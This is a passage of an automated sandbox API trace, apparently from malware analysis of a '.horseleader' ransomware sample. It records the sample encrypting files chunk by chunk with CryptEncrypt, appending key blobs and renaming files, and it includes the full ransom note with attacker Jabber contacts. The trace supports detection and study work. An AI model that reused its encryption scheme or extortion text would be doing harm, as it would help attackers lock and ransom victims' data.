ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0225.769] lstrcmpiW (lpString1="DESIGNER", lpString2="Windows") returned -1 [0225.769] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER") returned 42 [0225.769] 
lstrcmpW (lpString1="DESIGNER", lpString2=".") returned 1 [0225.769] lstrcmpW (lpString1="DESIGNER", lpString2="..") returned 1 [0225.769] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.769] GetProcessHeap () returned 0x780000 [0225.769] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0225.770] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*") returned 44 [0225.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0225.770] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.770] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\.") returned 44 [0225.770] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.770] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0225.770] lstrcmpiW (lpString1="..", 
lpString2="Windows") returned -1 [0225.770] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\..") returned 45 [0225.770] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.770] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.770] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0225.771] lstrcmpiW (lpString1="MSADDNDR.DLL", lpString2="Windows") returned -1 [0225.771] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 55 [0225.771] StrStrIW (lpFirst="MSADDNDR.DLL", lpSrch=".horseleader") returned 0x0 [0225.771] lstrcmpW (lpString1="MSADDNDR.DLL", lpString2="#Decrypt#.txt") returned 1 [0225.771] lstrcmpW (lpString1="MSADDNDR.DLL", lpString2="_uninstalling_.png") returned 1 [0225.771] lstrlenW (lpString=".testttjffg") returned 11 [0225.771] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpSrch=".testttjffg") returned 0x0 [0225.771] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0225.771] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0225.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program 
files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0225.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 55 [0225.772] StrStrW (lpFirst="MSADDNDR.DLL", lpSrch=".txt") returned 0x0 [0225.772] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=99136) returned 1 [0225.772] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.772] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0225.776] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.776] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0225.776] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x99a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.777] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0225.777] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.777] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0225.777] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x13340, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.777] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0225.778] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.778] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0225.778] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.778] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0225.778] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0225.778] CloseHandle (hObject=0x21c) returned 1 [0225.779] GetProcessHeap () returned 0x780000 [0225.779] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0225.779] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.horseleader") returned 67 [0225.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program 
files\\common files\\designer\\msaddndr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.horseleader" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.horseleader")) returned 1 [0225.780] GetProcessHeap () returned 0x780000 [0225.780] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0225.780] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 0 [0225.780] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0225.780] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\#Decrypt#.txt") returned 56 [0225.780] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\designer\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0225.781] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0225.781] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0225.782] lstrlenA (lpString="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") returned 1368 [0225.782] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0225.782] CloseHandle (hObject=0x1cc) returned 1 [0225.782] GetProcessHeap () returned 0x780000 [0225.782] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0225.782] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f72cdf0, ftCreationTime.dwHighDateTime=0x1d56620, ftLastAccessTime.dwLowDateTime=0x44cfa7f0, ftLastAccessTime.dwHighDateTime=0x1d5752f, ftLastWriteTime.dwLowDateTime=0x44cfa7f0, ftLastWriteTime.dwHighDateTime=0x1d5752f, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="isspos.exe", cAlternateFileName="")) returned 1 [0225.782] lstrcmpiW (lpString1="isspos.exe", lpString2="Windows") returned -1 [0225.782] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\isspos.exe") returned 44 [0225.783] StrStrIW (lpFirst="isspos.exe", lpSrch=".horseleader") returned 0x0 [0225.783] lstrcmpW (lpString1="isspos.exe", lpString2="#Decrypt#.txt") returned 1 [0225.783] lstrcmpW (lpString1="isspos.exe", lpString2="_uninstalling_.png") returned 1 [0225.783] lstrlenW (lpString=".testttjffg") returned 11 [0225.783] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\isspos.exe", lpSrch=".testttjffg") 
returned 0x0 [0225.783] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0225.783] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0225.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\isspos.exe" (normalized: "c:\\program files\\common files\\isspos.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0225.783] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0225.783] lstrcmpiW (lpString1="Microsoft Shared", lpString2="Windows") returned -1 [0225.783] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared") returned 50 [0225.783] lstrcmpW (lpString1="Microsoft Shared", lpString2=".") returned 1 [0225.783] lstrcmpW (lpString1="Microsoft Shared", lpString2="..") returned 1 [0225.783] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.783] GetProcessHeap () returned 0x780000 [0225.784] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0225.784] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\*") returned 52 [0225.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0225.784] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.784] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\.") returned 52 [0225.784] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.784] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0225.784] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.784] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\..") returned 53 [0225.784] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.784] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.784] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, 
ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DW", cAlternateFileName="")) returned 1 [0225.784] lstrcmpiW (lpString1="DW", lpString2="Windows") returned -1 [0225.784] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW") returned 53 [0225.784] lstrcmpW (lpString1="DW", lpString2=".") returned 1 [0225.784] lstrcmpW (lpString1="DW", lpString2="..") returned 1 [0225.784] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0225.784] GetProcessHeap () returned 0x780000 [0225.784] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0225.784] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*") returned 55 [0225.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0225.788] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0225.788] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\.") returned 55 
[0225.789] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0225.789] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0225.789] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0225.789] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\..") returned 56 [0225.789] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0225.789] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0225.789] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0225.789] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="Windows") returned -1 [0225.789] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 65 [0225.789] StrStrIW (lpFirst="DBGHELP.DLL", lpSrch=".horseleader") returned 0x0 [0225.789] lstrcmpW (lpString1="DBGHELP.DLL", lpString2="#Decrypt#.txt") returned 1 [0225.789] lstrcmpW (lpString1="DBGHELP.DLL", lpString2="_uninstalling_.png") returned 1 
[0225.789] lstrlenW (lpString=".testttjffg") returned 11 [0225.789] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpSrch=".testttjffg") returned 0x0 [0225.789] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.789] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.790] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.791] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 65 [0225.791] StrStrW (lpFirst="DBGHELP.DLL", lpSrch=".txt") returned 0x0 [0225.791] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1369952) returned 1 [0225.791] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.791] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.794] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.795] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.795] SetFilePointerEx (in: 
hFile=0x158, liDistanceToMove=0xa4bb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.795] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.797] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.797] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.798] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x149760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.798] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.801] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.801] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.801] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.801] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.801] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, 
